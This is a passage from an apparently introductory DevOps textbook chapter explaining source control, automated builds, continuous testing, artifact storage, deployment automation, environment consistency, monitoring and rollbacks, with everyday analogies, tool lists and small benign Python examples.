• Commit: When you make changes to your code and are satisfied, you “commit” those changes, effectively taking a snapshot of your code at that moment. It’s like finishing a chapter in your story and taking a photo of it.
• Branch: Sometimes, developers need to create a separate environment from the main project to work on new features or experiments without affecting the main project. Imagine creating a spin-off from the main story. You branch out to write a side story without changing the main plotline. Once you’re satisfied with the spin-off, you can integrate it back into the main story.
• Merge: Once the work on a branch is complete and tested, it can be combined (or “merged”) back into the main project. Once the side story (branch) has been finished and polished, you can weave it back into the main story.
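These four terms can be illustrated with a toy in-memory model. This is a deliberately simplified sketch – real systems such as Git store history very differently – and the class and method names are invented for this illustration:

```python
# Toy model of commit / branch / merge -- an illustration of the terminology
# above, NOT how Git actually works. All names are invented.
class TinyRepo:
    def __init__(self):
        self.branches = {"main": []}   # branch name -> list of commit messages
        self.current = "main"

    def commit(self, message):
        # Take a "snapshot" on the current branch.
        self.branches[self.current].append(message)

    def branch(self, name):
        # A new branch starts as a copy of the current history.
        self.branches[name] = list(self.branches[self.current])
        self.current = name

    def merge(self, source, target="main"):
        # Append the commits from `source` that `target` doesn't have yet.
        missing = self.branches[source][len(self.branches[target]):]
        self.branches[target].extend(missing)
        self.current = target

repo = TinyRepo()
repo.commit("write chapter 1")     # commit on main
repo.branch("side-story")          # branch off for the spin-off
repo.commit("draft the spin-off")  # commit on the branch
repo.merge("side-story")           # weave it back into main
print(repo.branches["main"])       # ['write chapter 1', 'draft the spin-off']
```

The merge here only handles the simple linear case; resolving conflicting changes is exactly the hard part real version control systems solve.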

Best practices
• Commit often: Small, frequent commits are better than large, infrequent ones. They’re easier to understand and manage.
• Write meaningful commit messages: Descriptive messages help other developers understand why certain changes were made.

• Keep the build healthy: Ensure that your changes keep the software intact. Always test before committing.
• Sync regularly: Pull the latest changes often to stay updated and avoid merge conflicts.
• Use branches: For every new feature or bug fix, use separate branches. This keeps the main (often called “master”) branch stable.
• Feature flags or toggles: These allow features to be merged into the main branch, even if they aren’t ready for release, and they can be toggled on or off in production.
A common question beginners ask is, “Why can’t I just make copies of my project with different names, such as ‘project-v1’, ‘project-v2’, and so on?” Well, while this is technically a way to have different versions, it’s highly inefficient:
• Space: Saving multiple copies eats up storage space.
• Collaboration: It’s hard to collaborate. Which version are others using? How do you consolidate changes?
• Tracking changes: With source control, you can view granular changes down to a single line of code. With the “Save As” method, you’d have to compare files manually.
• Automation and integration: Modern source control tools integrate with other tools, allowing for automation (such as automated testing) when code is committed.
In essence, source control isn’t just about keeping versions of your code. It’s about facilitating efficient collaboration, maintaining a record of the who/why/when of changes, and integrating seamlessly into a modern software development life cycle (SDLC).

Automated builds

Once the code is in the repository, automation tools compile or build the software to create an executable product. An automated build is a process where source code is automatically compiled and transformed into executable files, often without any human intervention. Think of it as a self-operating factory that takes in raw materials (source code) and produces a finished product (executable software). Before automated builds, developers had to manually compile and link their code, which was both time-consuming and error-prone – akin to crafting a piece of furniture by hand every time. Automated builds brought in machinery to do it consistently and swiftly. Think of a bakery machine: when you add ingredients (code) and select a setting, the machine automatically bakes a cake (software).


The importance of automated builds
• Consistency: Every build is done the same way, eliminating “it works on my machine” scenarios
• Speed: Computers work quickly, and automating the build process means developers can get feedback on their work almost immediately
• Error detection: Automated builds often include tests, so any errors in the code can be detected early
• Efficiency: Developers can focus on writing code, knowing the building and testing of their code is handled for them

Key components and terminologies
• Build script: A set of instructions that the automated build system follows to compile and build the software. It’s like a recipe in cooking. Just as a recipe guides you step by step in preparing a dish, the build script guides the computer in creating the software.
• CI server: A dedicated machine or server where the automated build process occurs. It continuously checks for new code commits, initiates builds, and runs tests. It’s like a watchful chef who starts preparing dishes as soon as new ingredients (code) are available.
• Dependencies: Many software projects rely on external libraries or components to function. These are called dependencies. Think of baking a cake. Apart from your main ingredients, you might need toppings, fillings, or frosting from different sources. These additional items are like your code’s dependencies.
• Build artifact: This is the output of the build process and is usually the executable file or software package. It’s the final dish, ready to be served after all the cooking steps are complete.
• Build failure: If there’s an error in the code or build process, the build will fail. Your cake didn’t bake properly because you forgot the baking powder – the failed cake is akin to a build failure.
Automated build systems rarely work alone. They’re part of a larger ecosystem:
• Source control: Before a build starts, the latest code is fetched from a version control system such as Git
• Testing: After a successful build, automated tests can be run to ensure the software’s quality
• Deployment: If the build and tests succeed, the software can be automatically deployed to servers or app stores
• Notifications: Developers and teams are notified about the build’s success or failure, often via email, chat apps, or dashboard displays
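As an illustration, here is a minimal “build script” in Python that compiles every source file in a project and fails the build on the first syntax error – roughly what a CI server does on each commit. This is a sketch using only the standard library; the project layout and file names are invented:

```python
# Minimal "build script" sketch: compile every Python source file and report
# failures, the way a CI server would fail a build on a broken commit.
import pathlib
import py_compile
import tempfile

def build(source_dir):
    errors = []
    for path in pathlib.Path(source_dir).rglob("*.py"):
        try:
            py_compile.compile(str(path), doraise=True)
        except py_compile.PyCompileError as exc:
            errors.append((str(path), str(exc)))
    return errors   # an empty list means the build succeeded

# Demo with a throwaway project directory (names are invented).
with tempfile.TemporaryDirectory() as project:
    pathlib.Path(project, "ok.py").write_text("print('hello')\n")
    pathlib.Path(project, "broken.py").write_text("def oops(:\n")  # syntax error
    failures = build(project)
    print(len(failures), "file(s) failed to compile")
```

A real build would also resolve dependencies and package the result; the key idea is that the script returns a machine-readable pass/fail verdict the pipeline can act on.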

Challenges and solutions around automated builds
• Flaky builds: Sometimes, builds fail inconsistently due to non-deterministic factors such as race conditions, uninitialized variables, time-dependent tests, and resource contention:
‚ Solution: Regularly clean up build environments, improve test reliability, and use build caching judiciously
• Long build times: As projects grow, build times can increase, slowing down feedback to developers:
‚ Solution: Optimize build scripts, use parallel and distributed builds, and ensure efficient dependency management
• Dependency hell: Managing external libraries and their versions can become tricky:
‚ Solution: Use dependency management tools and ensure that the build process uses locked and known versions of dependencies
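One common stopgap for flaky steps is a bounded retry, sketched below. Retries mask flakiness rather than cure it, so the root cause still needs fixing; all names here are invented for the example:

```python
# Sketch of a bounded-retry wrapper for flaky build steps. Retries are a
# stopgap while the underlying non-determinism is hunted down.
def run_with_retries(step, attempts=3):
    last_error = None
    for _ in range(attempts):
        try:
            return step()
        except Exception as exc:   # a real runner would catch narrower errors
            last_error = exc
    raise last_error               # exhausted: surface the real failure

# Simulate a step that fails twice with a transient error, then succeeds.
calls = {"n": 0}
def flaky_step():
    calls["n"] += 1
    if calls["n"] < 3:
        raise RuntimeError("transient failure")
    return "ok"

print(run_with_retries(flaky_step))   # ok (after two silent retries)
```

Note that a genuinely broken step still fails after the final attempt – the wrapper only absorbs transient errors, not real ones.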

Popular automated build tools
• Jenkins: An open source automation server that’s highly customizable with plugins
• Travis CI: A cloud-based CI/CD service integrated with GitHub
• CircleCI: Another cloud-based CI/CD platform that’s popular for its speed and integration capabilities
• Gradle and Maven: Popular build automation systems for Java projects
• MSBuild: A build platform for .NET and Visual Studio projects

Continuous testing

Continuous testing is an important facet of modern software development. After building the software, automation tools run a suite of tests to check that everything works as expected. Continuous testing is about immediate feedback and ensuring software quality at every stage. It’s like having a quality inspector who checks a product at every stage of its assembly line, ensuring that any defects are immediately addressed. In the software world, continuous testing is the process of running tests automatically, often and immediately, every time there’s a change in the code, ensuring that new changes haven’t introduced errors.

The importance of continuous testing
• Immediate feedback: Developers know right away if their changes have broken anything
• Efficiency: Catching issues early means they’re cheaper and easier to fix
• Confidence: With continuous testing, teams can be more confident that their code is always in a “ready-to-release” state


Key components and terminologies
• Unit tests: These are tests that check individual pieces (or “units”) of code, such as functions or methods, in isolation. It’s like checking each ingredient’s quality before using it in a recipe.
• Integration tests: While unit tests focus on individual parts, integration tests ensure that these parts work well together. Once all the ingredients have been verified, you ensure they blend well together in a dish.
• Regression tests: These tests ensure that new code changes haven’t negatively affected existing functionality. After adding a new spice to a dish, you taste it to make sure the original flavor hasn’t been lost.
• Test automation tools: These are software tools that automatically run the aforementioned tests every time there’s a change. Think of these tools as automated taste-test robots that sample the dish every time an ingredient is added.
• Test environment: This is a controlled setting where tests run. It replicates the conditions in which the software operates. Think of it like a test kitchen where you experiment with recipes before serving them in a restaurant.
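Here is what a small unit test looks like in practice, using Python’s built-in unittest module. The function under test, `add_caption`, is a made-up example for this sketch:

```python
# A minimal unit-test sketch with Python's built-in unittest module -- the
# kind of check a CI server runs automatically on every commit.
import unittest

def add_caption(photo, caption):
    """Hypothetical function under test: attach a caption to a photo record."""
    if not caption:
        raise ValueError("caption must not be empty")
    return {"photo": photo, "caption": caption}

class AddCaptionTests(unittest.TestCase):
    def test_attaches_caption(self):
        result = add_caption("beach.jpg", "Summer trip")
        self.assertEqual(result["caption"], "Summer trip")

    def test_rejects_empty_caption(self):
        # Regression guard: an empty caption must keep failing loudly.
        with self.assertRaises(ValueError):
            add_caption("beach.jpg", "")

# Run the suite programmatically, as a CI server would.
suite = unittest.TestLoader().loadTestsFromTestCase(AddCaptionTests)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print("tests run:", result.testsRun, "failures:", len(result.failures))
```

In a pipeline, a non-empty failure list would mark the build red and block the change from moving toward deployment.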

Challenges and solutions
• Maintaining test quality: Just having tests isn’t enough; they need to be good tests!
‚ Solution: Regularly review and update tests, ensuring they’re comprehensive and relevant
• Speed: As software grows, so does the number of tests, which can slow down the process:
‚ Solution: Use parallel testing (running multiple tests at once) and optimize test code for speed
• False positives: Sometimes, tests fail not because of a genuine issue but due to test flakiness or external factors:
‚ Solution: Regularly review test results, improve test reliability, and adjust as needed

Popular continuous testing tools
• JUnit: One of the most popular testing frameworks for Java, JUnit provides annotations to write and run tests easily.
• Selenium: This is a leading tool for automating web browsers. It allows testers to write scripts in various languages and run them across different web browsers, ensuring the application works consistently.
• Jenkins: While Jenkins is renowned as a CI tool, it’s also pivotal for continuous testing. Jenkins can automatically trigger tests after every build.

• TestNG: This is similar to JUnit but it provides more advanced functionalities, especially for integration and end-to-end tests. It’s primarily used with Java.
• Cucumber: This is a tool for behavior-driven development (BDD). Test cases are written in plain English, making them understandable even to non-technical stakeholders.
• QUnit: Used for testing JavaScript code, QUnit is popular among web developers.
• Appium: This is an open source tool for automating mobile applications on both Android and iOS using the WebDriver protocol.
• LoadRunner: For performance testing, LoadRunner from Micro Focus is a popular choice. It helps in identifying and resolving bottlenecks in a system.
• Travis CI: A cloud-based CI/CD platform integrated with GitHub. It allows automated testing and deployment.
• CircleCI: Another CI/CD platform popular for its continuous testing and integration capabilities.
• GitLab CI/CD: Built into the GitLab platform, it allows for easy setup of continuous integration, delivery, and deployment, along with testing.
• Postman: While it started as a tool for testing APIs, Postman has evolved into a full-fledged system for API development and testing.

Artifact storing

After successful testing, the built version of the software – called an “artifact” – is stored safely for deployment. Think of building software like crafting a hand-made car. You’ve assembled various pieces, painted them, and made the engine. These pieces, or the final car itself, are valuable items that you’d want to store in a safe place, perhaps a garage or a showroom. In the software world, after we “build” or “compile” our code, we get files (such as executable files, libraries, or packaged applications). These files are called artifacts, and we need a safe and organized place to store them. That’s where artifact storing comes into play.

The importance of artifact storing
• Safety: Just as you’d want your hand-crafted car to be safe from rain, theft, or other damage, we want our software artifacts safe from data loss.
• Version control: Over time, you might make different models or versions of your car. Similarly, software evolves, and we want to keep track of all versions of our artifacts.
• Accessibility: If someone wants to see or buy a particular model of your car, they should be able to easily locate it in the showroom. Likewise, developers or deployers should easily find and access the necessary software version.


• Consistency: Artifact repositories ensure consistent deployment across different environments. When deploying an application, you pull the same artifact from the repository, whether it’s for staging, testing, or production. This ensures that what you test is precisely what gets deployed.
• Collaboration: Teams across the globe can access the same set of artifacts, ensuring synchronized development and deployment efforts. It’s akin to a library that has branches worldwide, but each branch has an identical collection of books.
• Dependency management: Software projects often depend on other libraries or modules. Artifact repositories can store these dependencies, ensuring that all developers use the exact versions, reducing the infamous “it works on my machine” problem.

Key components and terminologies
• Repository: This is the dedicated storage space where artifacts are kept. It’s organized and indexed for easy retrieval. Think of it as a specialized garage for your hand-crafted cars, where each car (or artifact) has its spot.
• Metadata: This is additional information about each artifact, such as its creation date, creator, version number, and so on. An example is the spec sheets or labels for each car in your showroom, detailing its features, make date, and model.
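These two components can be sketched as a toy repository that stores each artifact under its name and version, next to a metadata file carrying a checksum for later verification. This is a simplified illustration using only the standard library – real repository managers such as Artifactory or Nexus do far more – and all names and values are invented:

```python
# Toy artifact repository sketch: each artifact is stored under name/version,
# with a metadata file whose checksum lets any later download be verified.
import hashlib
import json
import pathlib
import tempfile

def store_artifact(repo_dir, name, version, data: bytes):
    slot = pathlib.Path(repo_dir, name, version)
    slot.mkdir(parents=True)
    (slot / "artifact.bin").write_bytes(data)
    metadata = {
        "name": name,
        "version": version,
        "sha256": hashlib.sha256(data).hexdigest(),  # integrity fingerprint
    }
    (slot / "metadata.json").write_text(json.dumps(metadata))
    return metadata

def verify_artifact(repo_dir, name, version):
    slot = pathlib.Path(repo_dir, name, version)
    data = (slot / "artifact.bin").read_bytes()
    metadata = json.loads((slot / "metadata.json").read_text())
    return hashlib.sha256(data).hexdigest() == metadata["sha256"]

with tempfile.TemporaryDirectory() as repo:
    store_artifact(repo, "scrapbook-app", "1.0.0", b"compiled bytes")
    print(verify_artifact(repo, "scrapbook-app", "1.0.0"))   # True
```

Keying storage by name and version is what makes "deploy exactly what was tested" possible: staging and production both pull the same, checksum-verified bytes.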

Popular artifact-storing tools
• JFrog Artifactory: A universal artifact repository manager. It supports all major packages, build tools, and CI servers.
• Nexus Repository: Another popular choice, Nexus Repository manages software components, Docker containers, and other build artifacts.
• GitHub Packages: Integrated with GitHub, it allows you to host software packages right alongside your source code.
• Docker Hub: While mainly for Docker containers, Docker Hub can be seen as an artifact store for Docker images.
• AWS Simple Storage Service (S3): Amazon S3 can also be used as an artifact store, especially when combined with other tools.
• Azure Artifacts: Part of Azure DevOps, it offers package feeds for Maven, npm, Python, and NuGet.
• Google Cloud Storage: Like AWS S3, GCS can also be tailored for artifact storage needs.

Key features of artifact-storing tools
• Retention policies: Over time, the number of artifacts can grow exponentially. Good artifact tools allow you to set retention policies, determining how long to keep older versions before archiving or deleting them.

• Security and access control: These tools have mechanisms to control who can upload or download artifacts. Think of it as a vault where only authorized personnel can deposit or withdraw items.
• Search functionality: As repositories grow, finding specific artifacts can become challenging. Good search functionality, aided by metadata, makes this task easier.
• Replication and backup: Leading artifact storage tools allow replication of repositories across multiple locations, ensuring high availability and disaster recovery.
• Integration with CI/CD: Integrating artifact storage with CI/CD tools ensures a seamless pipeline from code integration to deployment.

Further considerations
• Storage costs: As your repository grows, so does the storage cost. It’s essential to keep an eye on storage needs and optimize accordingly, utilizing retention policies and efficient storage solutions.
• Maintenance: Like any other system, artifact storage tools require maintenance. Regular backups, updates, and monitoring are crucial.
• Hybrid and cloud solutions: Modern artifact storage tools offer cloud solutions, allowing flexibility in storage and access. Some also provide hybrid options, storing some artifacts on-premises while others are in the cloud.

Deployment automation

Deployment automation, while complex, is a revolutionary way of ensuring software gets where it needs to be, efficiently and effectively. Whether you’re serving a few or feeding thousands, deployment automation tools and methodologies are designed to make sure everyone gets what they’re expecting: the software artifact is automatically deployed to a server or cloud for user access. Imagine you’ve made a delicious dish and want to serve it at multiple parties. Instead of individually visiting each party to serve it, what if you had a magic tray that could instantly place your dish on every table? That’s what deployment automation is about – ensuring that your software/application (the dish) gets to every intended server or environment (the parties) efficiently and consistently.

The importance of deployment automation
• Consistency: It ensures that the application is deployed the same way every time, reducing errors.
• Speed: Automated processes are faster than manual ones. You can serve more parties quicker!
• Scalability: If your dish becomes super popular and you need to serve more parties, automation can handle that without getting overwhelmed.
• Reproducibility: If there’s an issue at one party, you can trace back the exact version of your dish that was served.


Key components and terminologies
• Configuration management: Making sure every party location is ready to accept and serve your dish, with the correct table settings
• Rollback: If you realize there’s an issue with the dish (maybe it’s too salty), you can quickly replace it with a previous version that everyone liked
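The rollback idea can be sketched in a few lines. This is a toy model – real deployment tools track releases and health checks far more carefully – and every name here is invented:

```python
# Rollback sketch: deploy a new version, run a health check, and restore the
# previous version automatically if the check fails. All names are invented.
def deploy_with_rollback(environment, new_version, health_check):
    previous = environment["version"]
    environment["version"] = new_version
    if health_check(environment):
        return "deployed"
    environment["version"] = previous    # automatic rollback
    return "rolled-back"

env = {"version": "1.0"}
too_salty = lambda e: False              # a failing health check
print(deploy_with_rollback(env, "2.0", too_salty), env["version"])    # rolled-back 1.0

tastes_fine = lambda e: True             # a passing health check
print(deploy_with_rollback(env, "2.0", tastes_fine), env["version"])  # deployed 2.0
```

The crucial design choice is keeping the previous version around until the new one has proven healthy – without it, there is nothing to roll back to.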

Popular deployment automation tools
• Jenkins: A powerhouse in the CI/CD world, Jenkins can automate the deployment of applications across various environments
• Ansible: Primarily a configuration management tool, Ansible can set up systems and deploy applications with its simple playbook approach
• Docker: While it’s known for containerization, combined with tools such as Kubernetes, Docker can automate the deployment of containerized applications
• Spinnaker: Created by Netflix, Spinnaker is a multi-cloud CD platform for releasing software changes with high velocity and confidence
• Octopus Deploy: A user-friendly tool focused on deploying applications, whether on-premises or in the cloud
• AWS CodeDeploy: Amazon’s deployment service that automates application deployments to different AWS services such as EC2, Lambda, and more
• GitLab CI/CD: Part of the GitLab platform, it provides a streamlined workflow to automate the deployment process
• Bamboo: Atlassian’s CI/CD offering, Bamboo integrates seamlessly with other Atlassian tools such as JIRA and Bitbucket

Challenges in deployment automation
• Complexity: Automating can be complex, especially for large-scale applications with multiple components. It’s like trying to serve a 10-course meal to hundreds of tables simultaneously.
• Initial setup time: The initial phase of setting up deployment automation can be time-consuming, but it’s an investment. It’s the difference between teaching one person to make a dish versus setting up an entire automated kitchen.
• Error management: Mistakes in the automation process can lead to widespread issues. For instance, if there’s an error in your dish and it’s automatically served to hundreds of tables, the impact is vast.

Real-world scenarios
• Scenario 1: You’ve developed a new feature for your online store. Instead of manually updating the store’s website, an automated system detects the change, tests the feature, and, if all’s good, updates the website – all while the store runs uninterrupted.
• Scenario 2: A gaming company releases a new level for its popular game. Instead of gamers having to manually download and install the new level, it’s automatically deployed to their devices, ensuring everyone gets the same experience.

Advanced tools and technologies
• Terraform: An IaC tool that allows you to define and provision infrastructure for multiple cloud platforms using a simple, consistent language.
• Kubernetes: An open source system for automating the deployment, scaling, and management of containerized applications. It ensures that the environment where your application runs is consistent.
• Chef and Puppet: Configuration management tools that ensure every system is set up precisely as required, based on predefined “recipes” or “manifests.”
• Rollbar and Sentry: Tools to monitor applications after deployment. If something goes wrong, they help identify what it was so that it can be fixed quickly.

Environment consistency

Environment consistency is the gold standard for ensuring software behaves predictably across different stages of its life cycle. Like a chef wanting their kitchen set up identically everywhere, developers strive for uniform environments to eliminate unexpected issues and enhance reliability. With modern tools in the mix, this consistency is achievable, ensuring that the “dish” (software) always meets expectations, no matter where it’s “served” (deployed). Automation tools ensure that the software’s environment (such as server configurations) is consistent across different stages, such as testing, staging, and production. Picture a popular chef, say, Gordon Ramsay, trying to cook his signature dish in different kitchens. For the dish to taste identical every time, every kitchen he uses must have the same oven settings, the same ingredients, the same utensils, and so on. Similarly, in software development, “environments” are like those kitchens. For a piece of software to function identically in development, testing, staging, and production, all these environments need to be consistent, or identical.

Importance
• Predictability: Ensuring the dish (software) tastes (works) the same way every time it’s prepared (deployed).
• Reliability: There’s confidence in the final result since tests in one environment reflect the behavior in others.


• Efficiency: Developers can avoid the notorious “it works on my machine” issue. There are no surprises due to environmental differences.

Challenges to achieving environment consistency
• Diverse infrastructure: Different departments might use varying hardware and software
• Configuration drift: Over time, minor changes in one environment can cause it to diverge from others
• External dependencies: Sometimes, software depends on external services, which might behave differently across environments

Tools to maintain environment consistency
Docker:
• What is it? A platform that packages software into containers. Think of containers as portable kitchen boxes containing everything Gordon Ramsay needs to cook his dishes. He can carry this box to any location and still make the dish perfectly.
• How does it help? By using Docker, developers ensure that the software runs in the same “container,” regardless of where the container is deployed.
Kubernetes:
• What is it? A system for managing containerized applications across a cluster of machines. Imagine a team of chefs coordinating to use the same kitchen box in various locations.
• How does it help? Kubernetes ensures that Docker containers are uniformly managed and orchestrated, preserving environment consistency even at scale.
Terraform:
• What is it? An Infrastructure-as-Code (IaC) tool. Think of it as a detailed recipe that describes exactly how to set up each kitchen.
• How does it help? With Terraform, infrastructure (such as servers and databases) is consistently set up based on the code’s predefined “recipe.”
Ansible, Chef, and Puppet:
• What are they? Configuration management tools. They ensure every kitchen tool, ingredient, and setting is precisely as required.
• How do they help? They automate the setup and maintenance of environments to ensure they match the desired state defined in their configurations (recipes).
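A simple way to reason about configuration drift is to fingerprint each environment’s configuration and compare the fingerprints – matching hashes mean the “kitchens” are set up alike. The sketch below uses invented configuration values to show the idea:

```python
# Drift-detection sketch: fingerprint each environment's configuration and
# compare fingerprints. The configuration values below are invented examples.
import hashlib
import json

def fingerprint(config: dict) -> str:
    # sort_keys makes the hash independent of dictionary ordering
    canonical = json.dumps(config, sort_keys=True)
    return hashlib.sha256(canonical.encode()).hexdigest()

staging    = {"python": "3.11", "db": "postgres-15", "debug": False}
production = {"python": "3.11", "db": "postgres-15", "debug": False}
drifted    = {"python": "3.11", "db": "postgres-14", "debug": False}

print(fingerprint(staging) == fingerprint(production))  # True  (consistent)
print(fingerprint(staging) == fingerprint(drifted))     # False (drift!)
```

Tools such as Terraform, Ansible, Chef, and Puppet go much further: rather than just detecting a mismatch, they converge each environment back to the declared desired state.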

Monitoring and feedback

Monitoring and feedback are indispensable in the realm of software development. They provide the real-time oversight and actionable insights needed to keep applications running smoothly and evolving in line with user needs. In the same way that a soccer coach observes, assesses, and guides players toward victory, effective monitoring and feedback tools guide software toward optimum performance and user satisfaction. Think of a soccer coach watching a match. The coach observes players, sees what’s working, spots weaknesses, and then gives feedback at half-time to improve the game. In the digital world, monitoring is like that coach, continuously watching over software applications, ensuring they’re performing as expected and catching any issues. Feedback is the actionable insight derived from this observation. Automated monitoring tools keep an eye on the software’s performance and health; if issues arise, notifications are sent out.

The importance of monitoring and feedback
• Awareness: Just as a coach needs to be aware of every move on the field, developers need to know what’s happening with their applications in real time.
• Swift problem resolution: If the coach spots a player making consistent mistakes, they can address it immediately. Similarly, quick feedback from monitoring tools allows developers to fix issues before they become critical.
• Optimization: Over time, the feedback helps in refining and optimizing the application, just as players improve their strategies with consistent coaching feedback.

Challenges of monitoring and feedback
• Data overload: Just as a coach can get overwhelmed watching multiple games simultaneously, monitoring tools can generate a flood of data that’s challenging to make sense of.
• False alarms: Sometimes, monitoring tools can send alerts that aren’t critical, such as a car alarm going off due to a gust of wind.
• Delay in feedback: Late feedback is like a coach giving advice after the match is over. It’s beneficial for the future, but not for immediate action.
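One common way to damp false alarms is to require several consecutive threshold breaches before alerting, as in the sketch below. This is a toy rule – real systems such as Prometheus use far richer alerting expressions – and the sample metric values are invented:

```python
# Threshold-alert sketch: the simplest monitoring rule. An alert fires only
# after several consecutive breaches, which damps one-off false alarms.
def check(samples, threshold, required_breaches=3):
    streak = 0
    for value in samples:
        streak = streak + 1 if value > threshold else 0
        if streak >= required_breaches:
            return "alert"
    return "ok"

# A single spike is ignored; a sustained breach raises an alert.
print(check([120, 350, 110, 130], threshold=300))   # ok
print(check([350, 360, 340, 120], threshold=300))   # alert
```

Requiring a streak trades a little detection latency for far fewer spurious pages – the same trade-off a coach makes by watching a player's pattern rather than reacting to one bad pass.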

Tools for monitoring and feedback
• New Relic: A performance monitoring tool for web applications, mobile applications, infrastructure, and more. Similar to watching instant replays of critical match moments, New Relic allows developers to dive deep into specific transactions and see where bottlenecks or errors occur.
• Prometheus: An open source monitoring toolkit. Think of it as setting up cameras at specific points on the soccer field. Prometheus targets specific metrics in your application, tracks them, and sends alerts if something's amiss.


• Sentry: A tool that provides error tracking to show real-time issues in applications. Like a medical team on standby during a match, Sentry instantly notifies developers of crashes or other critical issues, pinpointing the exact problem.
• Alertmanager: The alerting component of the Prometheus ecosystem. It deduplicates, groups, and routes alerts to the right channel, such as email or chat.
• FeedbackHub and UserVoice: These are platforms where users can suggest features, report issues, and give direct feedback about software or products. This is like post-match interviews with players and fans. Such platforms help developers understand user perspectives, needs, and pain points.

Feedback from multiple fronts
While system metrics and error logs are invaluable, feedback is multi-dimensional:
• End users: Direct feedback from users often provides insights that automated systems might miss. If a website feels slow to a user, it's a problem, even if backend metrics look perfect.
• Peer code reviews: Feedback isn't just about system performance. In development teams, peer reviews of code provide insights, catch potential bugs, and improve overall code quality.

Modern practices and tools
• Artificial intelligence for IT operations (AIOps): AIOps uses artificial intelligence to automate and enhance IT operations, particularly monitoring and analysis. It can sift through mountains of data, filter out noise, and highlight critical issues, like a security guard with superhuman observation skills.
• ChatOps: Integrating monitoring tools with team communication platforms such as Slack or Microsoft Teams. If something goes wrong, the tool immediately notifies the team in their chat. It's like getting a direct phone call when there's an issue, ensuring quick reactions.
• Tools such as Grafana, the Elasticsearch, Logstash, and Kibana (ELK) stack, and Splunk: These offer visual dashboards and advanced analytics, making it easier to visualize and understand system performance and issues.
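To make the ChatOps idea concrete, the sketch below turns a monitoring alert into a chat message payload. The JSON shape mimics a generic incoming webhook; the exact fields a real Slack or Teams webhook expects differ, so treat this as an illustrative assumption. In production, the resulting string would be POSTed to the team channel's webhook URL.

```python
import json

def build_chat_alert(service: str, severity: str, message: str) -> str:
    """Build a webhook-style JSON payload for a monitoring alert.

    The payload shape is a generic sketch, not any vendor's schema.
    """
    payload = {
        "text": f"[{severity.upper()}] {service}: {message}",
        "severity": severity,
    }
    return json.dumps(payload)

# Here we only construct the payload; an HTTP POST would deliver it.
alert = build_chat_alert("checkout-api", "critical", "error rate above 5%")
```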

Rollbacks
Rollbacks are a safety mechanism in the software development world. They allow teams to quickly undo problematic changes, ensuring that users continue to have a reliable and consistent experience. If a new release has a critical issue, automation tools can quickly revert to a previous, stable version, just as a baker who realizes a new cake flavor isn't popular would quickly switch back to baking the previous, beloved one. By leveraging modern tools and practices, teams can perform rollbacks smoothly, minimizing disruptions and ensuring software resilience.


Picture a child playing with building blocks and constructing a tower. If they add a block and the tower becomes unstable, they might remove that last block to stabilize it again. In the world of software, “rollbacks” are similar. If a recent change or update to software causes problems, a rollback restores the previous, stable version.
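The building-blocks analogy can be sketched in a few lines of code. The DeploymentHistory class below is an illustrative toy, not any real tool's API: releases are stacked up like blocks, and a rollback simply removes the last, unstable one.

```python
# Toy model of rollback: deployed versions form a stack, and rolling
# back pops the most recent (unstable) release off the top.
class DeploymentHistory:
    def __init__(self, initial_version: str):
        self.versions = [initial_version]

    @property
    def current(self) -> str:
        return self.versions[-1]

    def deploy(self, version: str) -> None:
        self.versions.append(version)

    def rollback(self) -> str:
        if len(self.versions) > 1:
            self.versions.pop()  # remove the unstable "block"
        return self.current

history = DeploymentHistory("v1.0")
history.deploy("v1.1")   # new release goes out
history.rollback()       # v1.1 misbehaves; we're back on v1.0
```

Real deployment tools add the hard parts this toy omits: traffic switching, database state, and dependency coordination.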

The importance of rollbacks
• Safety net: Just as removing an unstable block can prevent the entire tower from collapsing, rollbacks can prevent minor software issues from escalating into significant outages.
• Quick recovery: When things go south, every minute matters. Rollbacks offer a swift way to restore services while the problem is investigated in depth.
• User experience: Users expect consistent functionality. Rollbacks ensure that the user experience isn't compromised for extended periods.

Tools for rollbacks
Let's take a look at some of the important tools for implementing rollbacks:
• Version control systems (such as Git):
‚ What are they? Git is like a digital diary of software changes. Each change is dated, and you can jump back to any date to see what the software looked like then.
‚ How do they help? Git allows developers to revert to previous code states. If a recent change causes a problem, developers can use Git to restore an earlier, stable version.
• Database migration tools (such as Liquibase and Flyway):
‚ What are they? These tools manage changes and versions of a database schema and handle data migrations, stored procedures, and more. Think of them as diaries, but for databases.
‚ How do they help? If a software rollback requires the database to be reverted, these tools can help undo recent changes and restore the database to a previous state.
• Feature flags (such as LaunchDarkly and Split.io):
‚ What are they? A method to turn features on or off without changing the code. It's like having a remote control for software features.
‚ How do they help? If a new feature causes issues, it can be turned off (rolled back) without altering the code or doing a full software deployment.
• Container orchestration systems (such as Kubernetes):
‚ What are they? Systems that manage and organize software containers, handling scaling, load balancing, and the entire life cycle of containerized applications.


‚ How do they help? Kubernetes can quickly switch between different versions of software. If the new version has problems, Kubernetes can swiftly roll back to the previous version.
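The feature-flag idea from the list above is easy to demonstrate in code. The FeatureFlags class below is a hypothetical toy (real services such as LaunchDarkly or Split.io offer far richer targeting and audit trails), but it shows why disabling a flag is an instant rollback that requires no redeployment.

```python
# Toy feature-flag store: features default to off, and toggling one
# changes behavior immediately, without shipping new code.
class FeatureFlags:
    def __init__(self):
        self._flags = {}

    def enable(self, name: str) -> None:
        self._flags[name] = True

    def disable(self, name: str) -> None:
        self._flags[name] = False

    def is_enabled(self, name: str) -> bool:
        # Unknown flags are treated as off, a safe default.
        return self._flags.get(name, False)

flags = FeatureFlags()
flags.enable("new_checkout")

def render_checkout() -> str:
    if flags.is_enabled("new_checkout"):
        return "new checkout flow"
    return "classic checkout flow"

flags.disable("new_checkout")   # instant "rollback", no deployment
```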

Rollback challenges
• Data changes: If the software update also modified the database schema or data, rolling back the code might not be enough. The data might also need to be reverted, which can be complex.
• Dependencies: Sometimes, other components or services depend on the new version, making rollbacks tricky.
• Detection time: The longer it takes to detect a problem, the harder it can be to perform a rollback since more data and user interactions can accumulate.

Best practices for rollbacks
• Canary releases and phased rollouts: Before performing a full-scale update, deploy the new version to a small subset of users or servers. If issues arise, a rollback will impact fewer users. It's like tasting a spoonful of soup before serving it to everyone at the table.
• Automated testing: Before rolling out, automated tests should run to catch significant issues. Think of it as having a robot taste-tester for the soup mentioned earlier – it ensures the basics are right before humans taste it.
• Back up, back up, back up: Always back up data and configurations before updates. This practice is analogous to saving your work continuously while writing an important document. If something goes wrong, you don't lose everything.
• Monitor after deployment: Continuous monitoring post-deployment helps detect issues that might necessitate a rollback. It's like having a surveillance camera; you can spot when things start going wrong.
